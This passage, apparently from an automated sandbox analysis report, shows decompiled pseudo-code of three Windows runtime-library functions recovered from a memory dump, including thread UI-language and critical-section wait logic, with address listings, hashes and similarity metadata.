				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x548d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E053B7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E05468CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E053D9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E053DB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E053DCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E053B7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E05468F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E053DAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x5488628; // 0x0
								_v68 = _t77;
								_t78 =  *0x548862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x5488628; // 0x0
							_t116 =  *0x548862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x053bb94c
0x053bb956
0x053bb95c
0x053bb95e
0x053bb964
0x053bb969
0x053bb96d
0x053bb96d
0x053bb970
0x053bb974
0x053bb97a
0x053bbadf
0x053bbadf
0x053bbae2
0x053bbae4
0x053bbae6
0x053bbaf0
0x05402cb8
0x053bbaf6
0x053bbaf6
0x053bbaf6
0x053bbafd
0x053bbb1f
0x053bbb1f
0x053bbaff
0x053bbb00
0x053bbb00
0x053bbb03
0x053bbb03
0x053bbacb
0x053bbacf
0x053bbad0
0x053bbad1
0x053bbadc
0x053bbadc
0x053bb980
0x053bb980
0x053bb988
0x053bb98b
0x053bb98d
0x053bb990
0x053bb993
0x053bb999
0x053bb99b
0x053bb9a1
0x053bb9a5
0x053bb9aa
0x053bb9b0
0x053bb9bb
0x053bb9c0
0x053bb9c3
0x053bb9ca
0x053bb9cc
0x053bb9cf
0x053bb9d3
0x053bb9d7
0x053bba94
0x053bba94
0x053bba98
0x053bbaa3
0x05402ccb
0x053bbaa9
0x053bbaa9
0x053bbaa9
0x053bbab1
0x05402cd5
0x05402cdd
0x05402cdd
0x053bbabb
0x053bbabc
0x053bbac2
0x053bbac3
0x053bbac3
0x053bbac6
0x00000000
0x053bb9dd
0x053bb9dd
0x053bb9e7
0x053bb9e7
0x053bb9ec
0x053bb9ec
0x053bb9f1
0x053bb9f5
0x053bb9fa
0x053bba00
0x053bba0c
0x053bba10
0x053bba10
0x053bba12
0x053bba18
0x00000000
0x00000000
0x053bbb26
0x053bbb26
0x053bba1e
0x053bba1e
0x053bba23
0x053bba25
0x053bba2c
0x053bba30
0x053bba35
0x053bba35
0x053bba41
0x053bba46
0x053bba4c
0x053bba50
0x053bba54
0x053bba6a
0x053bba6e
0x053bba70
0x053bba74
0x053bba78
0x053bba7a
0x053bba7c
0x053bba8e
0x053bba90
0x053bba92
0x053bbb14
0x053bbb14
0x053bbb16
0x053bbb16
0x00000000
0x053bba7c
0x053bbb0a
0x053bbb0d
0x00000000
0x00000000
0x00000000
0x053bbb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 053BB9A5

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: d943b0372b328c3493d467a837d22b9d21249880d03dcf0f7802d93ebf75fef5
Instruction ID: a74c49ffc390cffc812d13a68c9372484cc2c2bd0ad1d6382d4b61a0c0970ec2
Opcode Fuzzy Hash: d943b0372b328c3493d467a837d22b9d21249880d03dcf0f7802d93ebf75fef5
Instruction Fuzzy Hash: AD515D71A18300CFD724CF29C49096AFBFAFB88650F54496EF68597B44DBB0E844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 053CFAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E053CFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E053AEEF0(0x5487b60);
					_t134 =  *0x5487b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x5487b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x5487b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E053A6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E053A76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E05438938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0539B150();
													}
													_t116 = E05436D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E053A75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x5488638; // 0x3301c58
																	_t122 = L053A38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E053A76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E053A76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L053CFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L053A70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E053CFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E053CFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E053CFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E053CFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E053CFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x5487b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x5487b84 = _t75;
						_t73 = E053AEB70(_t134, 0x5487b60);
						if( *0x5487b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E053AFF60( *0x5487b20);
							}
						}
						goto L5;
					}
				}
			}

0x053cfab0
0x053cfab2
0x053cfab3
0x053cfab4
0x053cfabc
0x053cfac0
0x053cfb14
0x053cfb17
0x053cfac2
0x053cfac8
0x053cfacd
0x053cfad3
0x053cfad3
0x053cfadd
0x053cfb18
0x053cfb1b
0x053cfb1d
0x053cfb1e
0x053cfb1f
0x053cfb20
0x053cfb21
0x053cfb22
0x053cfb23
0x053cfb24
0x053cfb25
0x053cfb26
0x053cfb27
0x053cfb28
0x053cfb29
0x053cfb2a
0x053cfb2b
0x053cfb2c
0x053cfb2d
0x053cfb2e
0x053cfb2f
0x053cfb3a
0x053cfb3b
0x053cfb3e
0x053cfb41
0x053cfb44
0x053cfb47
0x053cfb4a
0x053cfb4d
0x053cfb53
0x0540bdcb
0x0540bdcb
0x053cfb59
0x053cfb5b
0x053cfb5b
0x053cfb5e
0x0540bdd5
0x0540bdd8
0x00000000
0x0540bdda
0x00000000
0x0540bdda
0x053cfb64
0x053cfb64
0x053cfb64
0x053cfb67
0x053cfb6e
0x053cfb70
0x053cfb72
0x00000000
0x053cfb78
0x053cfb7a
0x053cfb7a
0x053cfb7d
0x053cfb80
0x0540bddf
0x0540bde1
0x00000000
0x0540bde3
0x00000000
0x0540bde3
0x053cfb86
0x053cfb86
0x053cfb86
0x053cfb8b
0x053cfb90
0x053cfb92
0x053cfb94
0x053cfb9a
0x053cfb9b
0x053cfba1
0x0540bde8
0x0540bdeb
0x0540bded
0x0540beb5
0x0540beb5
0x0540bebb
0x0540bebd
0x0540bec3
0x0540bed2
0x0540bedd
0x0540bedd
0x0540beed
0x00000000
0x0540bdf3
0x0540bdfe
0x0540be06
0x0540be0b
0x0540be0d
0x0540be0f
0x0540be14
0x0540be19
0x0540be20
0x0540be25
0x0540be27
0x0540be35
0x0540be39
0x0540be46
0x0540be4f
0x0540be54
0x0540be56
0x0540bef8
0x0540bef8
0x00000000
0x0540be5c
0x0540be5c
0x0540be60
0x00000000
0x0540be66
0x0540be66
0x0540be7f
0x0540be84
0x0540be87
0x0540be89
0x0540be8b
0x0540be99
0x0540be9d
0x0540bea0
0x0540beac
0x0540beaf
0x0540beb1
0x0540beb3
0x0540beb3
0x00000000
0x0540bea2
0x0540bea2
0x00000000
0x0540bea2
0x0540be8d
0x0540be8d
0x0540be92
0x00000000
0x0540be92
0x0540be8b
0x0540be60
0x0540be3b
0x0540be3b
0x0540be3e
0x00000000
0x0540be40
0x0540be40
0x0540be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0540be44
0x0540be3e
0x0540be29
0x0540be29
0x00000000
0x0540be29
0x0540be27
0x00000000
0x053cfba7
0x053cfba7
0x053cfbab
0x0540bf02
0x053cfbb1
0x053cfbb1
0x053cfbb8
0x053cfbbd
0x053cfbbd
0x053cfbbf
0x053cfbbf
0x053cfbc5
0x053cfbcb
0x053cfbf8
0x053cfbf8
0x053cfbfa
0x00000000
0x053cfc00
0x053cfc00
0x053cfc03
0x00000000
0x053cfc09
0x053cfc09
0x053cfc0f
0x053cfc15
0x053cfc23
0x053cfc23
0x053cfc25
0x053cfc27
0x053cfc75
0x053cfc7c
0x053cfc84
0x00000000
0x053cfc29
0x053cfc29
0x053cfc2d
0x053cfc30
0x0540bf0f
0x00000000
0x053cfc36
0x053cfc38
0x053cfc3b
0x053cfc41
0x0540bf17
0x0540bf19
0x0540bf48
0x0540bf4b
0x00000000
0x0540bf1b
0x0540bf22
0x0540bf24
0x0540bf26
0x00000000
0x0540bf2c
0x0540bf37
0x0540bf39
0x0540bf3b
0x00000000
0x0540bf41
0x0540bf41
0x0540bf41
0x0540bf41
0x0540bf45
0x00000000
0x0540bf45
0x0540bf3b
0x0540bf26
0x00000000
0x053cfc47
0x053cfc47
0x053cfc49
0x053cfcb2
0x053cfcb4
0x053cfcb6
0x053cfcdc
0x053cfcdc
0x00000000
0x053cfcb8
0x053cfcc3
0x053cfcc5
0x053cfcc7
0x00000000
0x053cfcc9
0x053cfcc9
0x053cfccd
0x00000000
0x053cfccd
0x053cfcc7
0x00000000
0x053cfc4b
0x053cfc4b
0x053cfc4e
0x053cfc4e
0x053cfc51
0x053cfc51
0x053cfc54
0x053cfc5a
0x053cfc5c
0x053cfc5f
0x053cfc61
0x053cfc63
0x053cfc65
0x053cfc67
0x053cfc6e
0x053cfc72
0x053cfc72
0x053cfc72
0x053cfc72
0x053cfc67
0x053cfc61
0x00000000
0x053cfc5a
0x053cfc49
0x053cfc41
0x053cfc30
0x053cfc27
0x053cfc03
0x053cfbcd
0x053cfbd3
0x053cfbd9
0x053cfbdc
0x053cfbde
0x053cfc99
0x053cfc9b
0x053cfc9d
0x053cfcd5
0x053cfcd5
0x053cfc89
0x053cfc89
0x00000000
0x053cfc9f
0x053cfc9f
0x053cfca3
0x00000000
0x053cfca3
0x00000000
0x053cfbe4
0x053cfbe4
0x053cfbe4
0x053cfbe4
0x053cfbe9
0x053cfbf2
0x00000000
0x053cfbf2
0x053cfbde
0x053cfbcb
0x053cfbab
0x053cfc8b
0x053cfc8b
0x053cfc8c
0x053cfb80
0x053cfb72
0x053cfb5e
0x053cfc8d
0x053cfc91
0x053cfadf
0x053cfadf
0x053cfae1
0x053cfae4
0x053cfae7
0x053cfaec
0x053cfaf8
0x053cfb00
0x053cfb07
0x053cfb0f
0x053cfb0f
0x053cfb07
0x00000000
0x053cfaf8
0x053cfadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0540BE0F

Memory Dump Source

Source File: 0000000F.00000002.480306194.0000000005370000.00000040.00000001.sdmp, Offset: 05370000, based on PE: true

Associated: 0000000F.00000002.480611341.000000000548B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.480637752.000000000548F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: bc05a3fee43db4278f072f9126a2400a127fc7c31bf8a3febd98c55b78effae0
Instruction ID: e4239cf68cbfaf95afb8b057851858f9a8c77cfc7aac6e5a80da83cfd099dd46
Opcode Fuzzy Hash: bc05a3fee43db4278f072f9126a2400a127fc7c31bf8a3febd98c55b78effae0
Instruction Fuzzy Hash: 36A1CE72B106068BDB25DB68C454BBEBBA6FF48710F1485BEE8069B790DB74DC018B84

Uniqueness

Uniqueness Score: -1.00%

Function 05392D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E05392D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x5485350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x5487bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E053D97C0();
				}
				if( *0x54879c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x54879c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E053C1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E053B7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0542FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E053D9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E053CE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L053EDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x5486901;
								_push(_t109);
								_v52 = _t98;
								if( *0x5486901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E053D9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E053D95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E053B7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E053B7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E05417016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0542FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x5485350;
							if(_t109 != 0x5485350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0542FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E05425720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x05392d8a
0x05392d8a
0x05392d92
0x05392d96
0x05392d9e
0x05392da0
0x05392da3
0x05392da5
0x05392da8
0x05392dab
0x05392db2
0x053ef9aa
0x053ef9ab
0x053ef9ae
0x053ef9ae
0x05392db8
0x05392dc2
0x053ef9b9
0x053ef9be
0x053ef9bf
0x053ef9bf
0x05392dcf
0x053ef9c9
0x05392dd5
0x05392dd5
0x05392dd5
0x05392dde
0x05392de1
0x05392e70
0x05392e72
0x05392e72
0x05392de7
0x05392deb
0x05392e7c
0x05392e83
0x05392e85
0x05392e8b
0x05392e8d
0x05392e92
0x05392e92
0x05392e85
0x05392df1
0x05392df7
0x05392df9
0x05392df9
0x05392dfc
0x05392dff
0x05392e02
0x00000000
0x05392e05
0x05392e0c
0x053ef9d9
0x05392e12
0x05392e12
0x05392e12
0x05392e1a
0x053ef9e3
0x053ef9e9
0x053ef9f0
0x053ef9f6
0x053ef9f8
0x053ef9f8
0x053ef9f0
0x05392e23
0x053efa02
0x053efa03
0x053efa05
0x053efa06
0x00000000
0x05392e29
0x05392e29
0x05392e2e
0x05392e34
0x05392e3e
0x00000000
0x00000000
0x05392e44
0x05392e47
0x05392e4d
0x00000000
0x00000000
0x05392e4f
0x05392e54
0x00000000
0x00000000
0x05392e5a
0x05392e5f
0x05392e9a
0x05392ea4
0x05392ea5
0x05392ea8
0x05392eaf
0x05392eb2
0x05392eb5
0x053efae9
0x053efaeb
0x053efaed
0x053efaef
0x053efaf7
0x053efaf8
0x053efafd
0x053efaff
0x053efb04
0x053efb04
